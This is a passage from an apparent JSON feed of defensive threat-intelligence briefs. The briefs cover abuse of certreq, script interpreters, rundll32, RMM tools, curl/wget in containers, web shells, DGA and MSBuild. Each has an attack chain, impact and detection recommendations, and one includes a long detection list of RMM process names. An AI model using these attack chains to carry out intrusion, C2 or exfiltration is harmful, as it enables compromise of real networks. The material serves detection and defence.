msxsl.exe.\u003c/li\u003e\n\u003cli\u003eWhitelist legitimate uses of msxsl.exe in your environment based on known good processes or applications to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T10:00:00Z","date_published":"2024-01-30T10:00:00Z","id":"/briefs/2024-01-msxsl-network-connection/","summary":"Msxsl.exe, a legitimate Windows utility, is being abused by adversaries to make network connections to non-local IPs for command and control or data exfiltration, potentially bypassing security measures.","title":"MsXsl.exe Network Connection for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-msxsl-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon Event ID 1 - Process Creation","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["lolbin","command-and-control","exfiltration","certreq"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Certreq utility is a command-line tool used for managing certificates. Adversaries may abuse Certreq to download files from or upload data to a remote server by initiating an HTTP POST request. This behavior can be used for command and control (C2) or exfiltration. This technique leverages a legitimate system binary (LOLBin) to evade detection. Elastic has observed this behavior being detected through multiple data sources including Elastic Defend, Microsoft Defender XDR, Sysmon, SentinelOne, and Crowdstrike. This is a cross-industry threat that can affect any organization using Windows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes Certreq.exe with the \u003ccode\u003e-Post\u003c/code\u003e argument to initiate an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe Certreq process attempts to connect to a remote server to send or receive data.\u003c/li\u003e\n\u003cli\u003eThe remote server responds to the Certreq request, potentially delivering a file or receiving exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk (if applicable).\u003c/li\u003e\n\u003cli\u003eThe attacker may execute the downloaded file or further process the exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to clean up the Certreq command from command history or logs to evade detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to the download and execution of malicious payloads, potentially compromising the affected system and network. Alternatively, sensitive data could be exfiltrated from the target environment. The impact can range from data theft and system compromise to full network intrusion, depending on the attacker\u0026rsquo;s objectives and the data accessed. The severity is medium because Certreq is a legitimate tool, and its abuse requires specific command-line arguments and network activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Certreq HTTP Post Request\u0026rdquo; to your SIEM to identify potential abuse of Certreq for file transfer.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the execution of Certreq.exe and its command-line arguments, enabling detections.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from Certreq.exe for unusual destinations or data transfer patterns using network connection logs.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of Certreq.exe executing with the \u003ccode\u003e-Post\u003c/code\u003e argument, as this is not typical usage of the utility.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T20:47:00Z","date_published":"2024-01-28T20:47:00Z","id":"/briefs/2024-01-certreq-post/","summary":"Adversaries may abuse the Windows Certreq utility to download files or upload data to a remote URL by making an HTTP POST request, potentially for command and control or exfiltration, which can be detected by monitoring process execution events.","title":"Potential Abuse of Certreq for File Transfer via HTTP POST","url":"https://feed.craftedsignal.io/briefs/2024-01-certreq-post/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Script Host"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","windows","script_interpreter"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers commonly use Windows Script Host (WSH) scripts as an initial access method or to download tools and utilities. This involves using built-in Windows script interpreters like \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e to download executable files from remote destinations. This behavior is significant because it allows attackers to bypass traditional defenses and establish a foothold in the system or download further tools. Defenders should monitor for suspicious network connections initiated by script interpreters followed by the creation of executable files on the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (delivery mechanism not specified in source).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script using \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script interpreter makes an outbound network connection to a remote server.\u003c/li\u003e\n\u003cli\u003eThe remote server hosts a malicious executable file (e.g., .exe, .dll).\u003c/li\u003e\n\u003cli\u003eThe script downloads the malicious executable to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded malicious file to establish persistence or further compromise the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs additional actions, such as lateral movement or data exfiltration (not detailed in the source).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system. This can result in data breaches, financial losses, and reputational damage. The source does not contain specific victim numbers or sectors targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - File Creation\u0026rdquo; to your SIEM to detect the creation of executable files after network activity from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - Network Connection\u0026rdquo; to detect network connections from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Event ID 11 (File Create) for enhanced visibility into network and file activity related to script interpreters.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T12:00:00Z","date_published":"2024-01-28T12:00:00Z","id":"/briefs/2024-01-28-remote-file-copy-scripts/","summary":"Attackers are using Windows script interpreters (cscript.exe or wscript.exe) to download executable files from remote locations to deliver second-stage payloads or download tools.","title":"Remote File Download via Script Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-28-remote-file-copy-scripts/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers often abuse the \u003ccode\u003erundll32.exe\u003c/code\u003e utility to execute malicious Dynamic Link Libraries (DLLs), blending their activity with legitimate system operations. This detection identifies instances where \u003ccode\u003erundll32.exe\u003c/code\u003e establishes outbound network connections, particularly when executed without command-line arguments. Such behavior deviates from typical usage and may indicate command and control (C2) activity or other malicious actions. The rule is designed to detect command and control activity where adversaries are using \u003ccode\u003erundll32.exe\u003c/code\u003e without arguments to make external network connections. The rule uses data from Elastic Defend, Sysmon, and SentinelOne to detect this behavior. The rule specifically excludes connections to well-known private and reserved IP ranges to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute a malicious DLL using \u003ccode\u003erundll32.exe\u003c/code\u003e without specifying arguments, which is an anomaly.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003erundll32.exe\u003c/code\u003e is invoked with a command line resembling: \u003ccode\u003erundll32.exe \u0026lt;path_to_dll\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL initiates an outbound network connection to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe network connection attempts to bypass firewall rules by masquerading as a legitimate system process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses this connection to establish a command and control channel.\u003c/li\u003e\n\u003cli\u003eData exfiltration or further exploitation activities occur over the established C2 channel.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data theft, ransomware deployment, or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish command and control channels on compromised systems, leading to potential data exfiltration, lateral movement within the network, and deployment of ransomware. This can result in significant financial losses, reputational damage, and disruption of business operations. The impact is broad, affecting any Windows environment where \u003ccode\u003erundll32.exe\u003c/code\u003e is used.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Unusual Network Connection via RunDLL32\u003c/code\u003e to your SIEM and tune for your environment to detect unusual network connections made by \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation and network connection logging to capture necessary events for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent processes of \u003ccode\u003erundll32.exe\u003c/code\u003e and the destination IP addresses of the network connections.\u003c/li\u003e\n\u003cli\u003eReview and harden firewall rules to prevent unauthorized outbound connections from system processes like \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted DLLs via \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T10:00:00Z","date_published":"2024-01-26T10:00:00Z","id":"/briefs/2024-01-rundll32-network-connection/","summary":"The rule detects unusual outbound network connections made by rundll32.exe, specifically when executed with minimal arguments, which may indicate command and control activity or defense evasion tactics on Windows systems.","title":"Unusual Network Connection via RunDLL32","url":"https://feed.craftedsignal.io/briefs/2024-01-rundll32-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Elastic Endgame","Sysmon","AA_v*.exe","AeroAdmin.exe","AnyDesk.exe","apc_Admin.exe","apc_host.exe","AteraAgent.exe","aweray_remote*.exe","AweSun.exe","AgentMon.exe","B4-Service.exe","BASupSrvc.exe","bomgar-scc.exe","domotzagent.exe","domotz-windows-x64-10.exe","dwagsvc.exe","DWRCC.exe","ImperoClientSVC.exe","ImperoServerSVC.exe","ISLLight.exe","ISLLightClient.exe","fleetdeck_commander*.exe","getscreen.exe","g2aservice.exe","GoToAssistService.exe","gotohttp.exe","jumpcloud-agent.exe","level.exe","LvAgent.exe","LMIIgnition.exe","LogMeIn.exe","Lunixar.exe","LunixarRemote.exe","LunixarUpdater.exe","ManageEngine_Remote_Access_Plus.exe","MeshAgent.exe","Mikogo-Service.exe","NinjaRMMAgent.exe","NinjaRMMAgenPatcher.exe","ninjarmm-cli.exe","parsec.exe","PService.exe","quickassist.exe","r_server.exe","radmin.exe","radmin3.exe","RCClient.exe","RCService.exe","RemoteDesktopManager.exe","RemotePC.exe","RemotePCDesktop.exe","RemotePCService.exe","rfusclient.exe","ROMServer.exe","ROMViewer.exe","RPCSuite.exe","rserver3.exe","rustdesk.exe","rutserv.exe","rutview.exe","saazapsc.exe","ScreenConnect*.exe","session_win.exe","Remote Support.exe","smpcview.exe","spclink.exe","Splashtop-streamer.exe","Syncro.Overmind.Service.exe","SyncroLive.Agent.Runner.exe","SRService.exe","strwinclt.exe","Supremo.exe","SupremoService.exe","tacticalrmm.exe","tailscale.exe","tailscaled.exe","teamviewer.exe","ToDesk_Service.exe","twingate.exe","TiClientCore.exe","TSClient.exe","tvn.exe","tvnserver.exe","tvnviewer.exe","UltraVNC*.exe","UltraViewer*.exe","vncserver.exe","vncviewer.exe","winvnc.exe","winwvc.exe","Zaservice.exe","ZohoURS.exe","Velociraptor.exe","ToolsIQ.exe","CagService.exe","ScreenConnect.ClientService.exe","TiAgent.exe","GoToResolveProcessChecker.exe","GoToResolveUnattended.exe","Syncro.Installer.exe"],"_cs_severities":["medium"],"_cs_tags":["remote-access","rmm","command-and-control","persistence"],"_cs_type":"advisory","_cs_vendors":["Elastic","Action1 Corporation","AeroAdmin LLC","Ammyy LLC","Atera Networks Ltd","AWERAY PTE. LTD.","BeamYourScreen GmbH","Bomgar Corporation","DUC FABULOUS CO.,LTD","DOMOTZ INC.","DWSNET OÜ","FleetDeck Inc","GlavSoft LLC","Hefei Pingbo Network Technology Co. Ltd","IDrive, Inc.","IMPERO SOLUTIONS LIMITED","Instant Housecall","ISL Online Ltd.","LogMeIn, Inc.","LUNIXAR SAS DE CV","MMSOFT Design Ltd.","Nanosystems S.r.l.","NetSupport Ltd","NinjaRMM, LLC","Parallels International GmbH","philandro Software GmbH","Pro Softnet Corporation","RealVNC","Remote Utilities LLC","Rocket Software, Inc.","SAFIB","Servably, Inc.","ShowMyPC INC","Splashtop Inc.","Superops Inc.","TeamViewer","Techinline Limited","uvnc bvba","Yakhnovets Denis Aleksandrovich IP","Zhou Huabing","ZOHO Corporation Private Limited","Connectwise, LLC","BreakingSecurity.net","Tailscale","Twingate","RustDesk","Zoho","JumpCloud","ScreenConnect","GoTo"],"content_html":"\u003cp\u003eAttackers commonly abuse legitimate remote monitoring and management (RMM) tools and remote access software for command and control (C2), persistence, and execution of native commands on compromised endpoints. These tools provide attackers with the ability to maintain access, execute commands, and move laterally within a network. This detection identifies when a process associated with commonly abused RMM/remote access tools is observed for the first time on a host. The rule is designed to trigger when a new process name or code signature associated with RMM software, or a child process of such software, is seen within a configured history window. This helps defenders quickly identify potentially malicious use of legitimate tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The attacker gains initial access to a target system through various methods, such as exploiting vulnerabilities or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys a remote monitoring and management (RMM) tool or remote access software on the compromised endpoint. This may involve downloading and installing the tool, or exploiting existing installations.\u003c/li\u003e\n\u003cli\u003ePersistence: The RMM tool is configured to run persistently on the system, ensuring that the attacker maintains access even after a reboot or other disruption. This may involve creating a service or adding a registry key to ensure the tool starts automatically.\u003c/li\u003e\n\u003cli\u003eCommand and Control: The attacker uses the RMM tool to establish a command and control (C2) channel with the compromised system. This allows them to remotely execute commands, transfer files, and monitor activity on the system.\u003c/li\u003e\n\u003cli\u003eLateral Movement: Using the RMM tool, the attacker moves laterally within the network, compromising additional systems and escalating their access. This may involve using the tool to access shared resources or execute commands on other systems.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or Ransomware Deployment: The attacker uses their access to exfiltrate sensitive data from the compromised network or deploy ransomware to encrypt files and demand a ransom payment.\u003c/li\u003e\n\u003cli\u003eCleanup: The attacker may attempt to remove traces of their activity, such as logs or files associated with the RMM tool, to avoid detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via RMM tools can lead to significant data breaches, financial losses, and reputational damage. The use of legitimate tools makes detection more difficult. Successful attacks can result in ransomware deployment, data theft, and prolonged unauthorized access to sensitive systems. Organizations in all sectors are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the process creation rule to detect the execution of RMM tools on endpoints based on \u003ccode\u003eprocess.name\u003c/code\u003e and \u003ccode\u003eprocess.code_signature.subject_name\u003c/code\u003e criteria in the query.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to ensure the collection of necessary event data for the detection rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the detection rule to determine whether the execution of the RMM tool is authorized and legitimate. Refer to the references for a list of commonly abused RMM tools and associated indicators.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-first-time-seen-rmm/","summary":"Detects the execution of previously unseen remote monitoring and management (RMM) tools or remote access software on compromised Windows endpoints, often leveraged for command-and-control, persistence, and execution of malicious commands.","title":"First Time Seen Remote Monitoring and Management Tool Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-first-time-seen-rmm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Auditd Manager"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","container","auditd","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies instances of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e being executed from within containers managed by \u003ccode\u003erunc\u003c/code\u003e on Linux systems. The rule leverages Auditd Manager to monitor system calls and flags processes running with the title \u003ccode\u003erunc init\u003c/code\u003e that then execute \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e. This activity is noteworthy because attackers often use these tools to download malicious payloads (stagers, scripts, implants) or to exfiltrate data after compromising a container. While these tools can be used legitimately within containers, their execution in the context of \u003ccode\u003erunc init\u003c/code\u003e suggests a higher risk of malicious activity. The rule focuses on narrowing the signal to the container runtime boundary where unexpected download clients are more worthy of review. The rule specifically leverages Auditd Manager for data collection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a host system, possibly through exploiting a vulnerability in an application running outside the container (e.g., web application).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a containerized application running on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability within the container, or abuses a privileged workload within the container, to gain elevated privileges or code execution within the container.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download additional tools or scripts into the container. These tools might include reverse shells, credential dumping tools, or data exfiltration utilities.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded tools to further compromise the container or the underlying host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to stage data for exfiltration to an external server. This may involve compressing and encoding data before transmission.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates the data exfiltration process using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to send the staged data to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, which could include data theft, system disruption, or further lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised containers can lead to data breaches, service disruptions, and further attacks on internal systems. Successful exploitation could allow attackers to steal sensitive data, install malware, or pivot to other parts of the network, impacting confidentiality, integrity, and availability. The number of affected systems depends on the scope of the container deployment and the privileges granted to the compromised container.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Curl or Wget Execution from Container Context\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Auditd Manager with syscall coverage including \u003ccode\u003eexecve\u003c/code\u003e to capture process execution and arguments within containers, as mentioned in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with network logs to identify the destination IP addresses and domains contacted by the compromised container.\u003c/li\u003e\n\u003cli\u003eBaseline trusted images and exclude stable image digests or namespaces when noisy to reduce false positives, as suggested in the rule\u0026rsquo;s false positives section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-curl-wget-container-execution/","summary":"This rule detects the execution of curl or wget from within runc-backed containers on Linux systems monitored by Auditd Manager, indicating potential ingress tool transfer or data exfiltration by attackers who have compromised the container.","title":"Curl or Wget Execution from Container Context","url":"https://feed.craftedsignal.io/briefs/2024-01-curl-wget-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","command-and-control","web shell","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule focuses on identifying potentially malicious activity stemming from Linux-based web servers. The rule is triggered when a web server process, such as Apache, Nginx, or others, initiates an outbound network connection to a destination port that is considered non-standard. This activity can signal the presence of a web shell, a malicious script uploaded to a web server to enable remote access and control. Attackers may exploit compromised web servers to establish covert communication channels, exfiltrate data, or launch further attacks on internal systems. The rule leverages data from Elastic Defend to monitor network connections and filter out legitimate traffic based on a predefined list of common ports and internal IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained via exploitation of a vulnerability in a web application or web server component running on a Linux system (e.g., through SQL injection or remote code execution).\u003c/li\u003e\n\u003cli\u003eA web shell is uploaded to the compromised web server, often disguised as a legitimate file or hidden within existing directories.\u003c/li\u003e\n\u003cli\u003eThe attacker interacts with the web shell through HTTP requests, using it as a command and control interface.\u003c/li\u003e\n\u003cli\u003eThe web shell executes commands on the server, initiating outbound network connections to non-standard ports.\u003c/li\u003e\n\u003cli\u003eThese connections may be used to communicate with external C2 servers, download additional payloads, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the web shell to move laterally within the network, targeting other systems and services.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to establish persistence on the compromised server, ensuring continued access even after system reboots.\u003c/li\u003e\n\u003cli\u003eThe final objective is data theft, system compromise, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised web servers can lead to significant data breaches, system downtime, and reputational damage. While this rule triggers on low-severity behavior, successful exploitation can lead to complete system compromise. The number of affected systems depends on the scope of the initial vulnerability and the attacker\u0026rsquo;s ability to move laterally. Organizations in all sectors that rely on web-based applications are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect web server processes initiating connections to unusual destination ports and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend integration to collect the necessary network event data from Linux endpoints to activate the rule.\u003c/li\u003e\n\u003cli\u003eReview and customize the list of excluded destination ports and internal IP ranges in the Sigma rule to match your organization\u0026rsquo;s specific network configuration and legitimate traffic patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule to determine if the activity is malicious or benign, focusing on the process name, user, destination IP, and destination port.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:28:00Z","date_published":"2024-01-09T18:28:00Z","id":"/briefs/2024-01-uncommon-web-server-port/","summary":"The rule identifies unusual outbound network connections on non-standard ports originating from web server processes on Linux systems, indicative of potential web shell activity or unauthorized communication.","title":"Uncommon Destination Port Connection by Web Server on Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-uncommon-web-server-port/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["low"],"_cs_tags":["dga","command-and-control","machine-learning"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis brief describes a detection of potential DGA (Domain Generation Algorithm) activity identified by an Elastic machine learning job. DGAs are often used by malware for command and control (C2) communication, generating domain names dynamically to evade detection. The machine learning job, \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e, analyzes DNS requests to identify source IP addresses that exhibit a high probability of DGA activity. This detection relies on the DGA Detection integration, which includes an ML-based framework to detect DGA activity in DNS events. The integration requires Fleet and DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. This activity matters for defenders because successful DGA-based C2 channels can allow malware to maintain communication and control even when individual malicious domains are blocked.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network, potentially through unpatched vulnerabilities or social engineering.\u003c/li\u003e\n\u003cli\u003eMalware is deployed on the compromised host. This malware contains a DGA.\u003c/li\u003e\n\u003cli\u003eThe malware uses the DGA to generate a list of potential domain names.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates DNS requests to resolve the generated domain names.\u003c/li\u003e\n\u003cli\u003eThe DNS requests are sent to internal or external DNS servers.\u003c/li\u003e\n\u003cli\u003eThe machine learning job \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e analyzes the DNS requests, specifically looking for source IPs with a high aggregate probability of generating DGA domains.\u003c/li\u003e\n\u003cli\u003eIf the anomaly score exceeds the threshold (70), an alert is triggered.\u003c/li\u003e\n\u003cli\u003eThe malware successfully establishes a C2 channel with a dynamically generated domain, enabling further malicious activities such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of DGA-based command and control can lead to persistent malware infections, data exfiltration, and further compromise of systems within the network. While the severity is rated low, the potential impact can escalate quickly if the C2 channel is used for more damaging activities. This detection focuses on identifying potential DGA activity, enabling security teams to investigate and prevent further damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure the DGA Detection integration is installed and properly configured, including the machine learning job \u003ccode\u003edga_high_sum_probability_ea\u003c/code\u003e (references: \u003ca href=\"https://docs.elastic.co/en/integrations/dga\"\u003eElastic DGA Detection documentation\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html\"\u003eprebuilt ML jobs\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eVerify that DNS events are being collected by Elastic Defend, Network Packet Capture, or Packetbeat and that the data view used by the machine learning job includes these events (references: \u003ca href=\"https://docs.elastic.co/en/integrations/endpoint\"\u003eElastic Defend\u003c/a\u003e, \u003ca href=\"https://docs.elastic.co/integrations/network_traffic\"\u003eNetwork Packet Capture\u003c/a\u003e, \u003ca href=\"https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html\"\u003ePacketbeat\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eTune the anomaly threshold (currently 70) in the machine learning job based on your environment to reduce false positives and ensure timely detection of DGA activity.\u003c/li\u003e\n\u003cli\u003eReview and implement the triage and analysis steps outlined in the rule\u0026rsquo;s note section, focusing on identifying the source IP, analyzing DNS request patterns, and cross-referencing domains with threat intelligence feeds.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T15:00:00Z","date_published":"2024-01-09T15:00:00Z","id":"/briefs/2024-01-dga-activity/","summary":"A machine learning job detected potential DGA (domain generation algorithm) activity indicative of malware command and control (C2) channels, identifying source IP addresses making DNS requests with a high probability of being DGA-generated, a technique used by adversaries to evade detection.","title":"Potential DGA Activity Detected by Machine Learning","url":"https://feed.craftedsignal.io/briefs/2024-01-dga-activity/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","msbuild"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may abuse the Microsoft Build Engine (MSBuild) to execute malicious files or masquerade as legitimate utilities to bypass detections and evade defenses. MSBuild is a platform for building applications using an XML schema for project files that controls how the build platform processes and builds software. The observed behavior involves MsBuild.exe initiating outbound network connections, which is not typical for its intended use and may indicate unauthorized code execution or command and control activity. This activity can be used to download malicious payloads, exfiltrate data, or establish a reverse shell. Detecting this behavior is crucial as it can be an early indicator of compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access through an external vector (e.g., phishing, software vulnerability).\u003c/li\u003e\n\u003cli\u003eAttacker executes MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eMSBuild executes a malicious project file (.csproj, .vbproj).\u003c/li\u003e\n\u003cli\u003eThe project file contains embedded or referenced code (e.g., C#, VB.NET) designed to perform malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes, initiating a network connection.\u003c/li\u003e\n\u003cli\u003eThe network connection is established to an external command and control (C2) server or a resource hosting a malicious payload.\u003c/li\u003e\n\u003cli\u003eData exfiltration or payload download occurs via the network connection.\u003c/li\u003e\n\u003cli\u003eThe attacker gains further control over the compromised system, potentially leading to lateral movement or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can lead to 